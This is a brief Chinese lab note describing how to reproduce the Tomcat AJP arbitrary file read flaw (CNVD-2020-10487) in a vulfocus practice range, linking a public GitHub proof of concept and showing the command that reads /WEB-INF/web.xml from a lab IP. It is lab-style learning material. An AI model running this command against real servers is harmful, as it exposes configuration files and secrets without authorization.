1、搭建靶场环境 使用vulfocus添加
2、网站找到大佬poc
https://github.com/nibiwodong/CNVD-2020-10487-Tomcat-ajp-POC
3、使用测试
python poc.py -p 27017 -f "/WEB-INF/web.xml" 192.168.16.128
任意文件读取成功